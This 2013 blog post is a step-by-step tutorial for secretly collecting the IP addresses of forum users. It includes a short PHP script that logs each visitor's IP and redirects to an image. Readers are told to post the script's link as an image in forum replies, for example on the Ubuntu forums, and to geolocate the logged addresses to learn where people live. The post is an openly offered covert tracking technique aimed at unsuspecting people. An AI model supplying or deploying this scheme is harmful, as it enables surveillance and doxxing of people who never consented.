Amazon.com Widgets

Adfly

Tuesday 7 May 2013

How to collect Hundreds of IP addresses!



This will allow you to harvest hundreds of people IP addresses easily every day on most forums and chat websites from this Ip you will be able to tell exactly where they live...

1. The first thing you are going to do is create a 000webhost account to build the page.
2. Once created Click on the 'Go to Cpanel' link.

2. Once on Cpanel scroll down until you find File Manager and click on that. You should be greeted with the screen below:
3. Then Click on public html and delete the two files inside below the Up folder.
4. Once those two have been deleted click on the New file Button and paste this PHP script:

header( 'Location: www.google.com') ;
$ip = $_SERVER['REMOTE_ADDR'];
$fo = fopen("ip.txt", "a");
$fw = fwrite($fo, "$ip\n");
fclose($fo);
?>

5. Save the file as 'ip.php'. Above where it says www.google.com is where the page will redirected to when the user clicks on that link this will be changed later.

6. So Now go to your sites main page and click on the ip.php link you should go to google.com. Now go back to the file manager and you should see a new file below your ip.php called ip.txt in this file will be your ip.

7. So now thats working we need a way to harvest lots of IPs. So go onto a forum of your choice that allows you to post images as a reply to the question thats being asked on the forum. I used The Ubuntu forums which has thousands of visitors a day. Now find and image on google that is relevent to the forum you are on ( I chose the ubuntu image below) and paste the url of that image into the ip.php file text where it says www.google.com.


8. Now once you have done all of the above go back to the home page of the site you created and right click on the ip.php link and click copy link url. Then post a reply to one of the forum chats and click add image then where it says to post the image URL paste the link you just copied. 

Now whenever anyone visits that forum their ip address will be recorded in ip.txt. Here is the Ip location site: www.iplocation.net 
You can use this on pretty much any website that allows you to post an image for all you no i could be harvesting your ip and finding out where you live right now... (I'm not i swear) But this brings me to my next post how can you hide your ip address so no one can find it?

Was This Post Useful?

0 comments :

Post a Comment

Please leave a comment letting me know whether this worked for you or what you think!
Comments that are not related to the post will not be approved and won't be posted.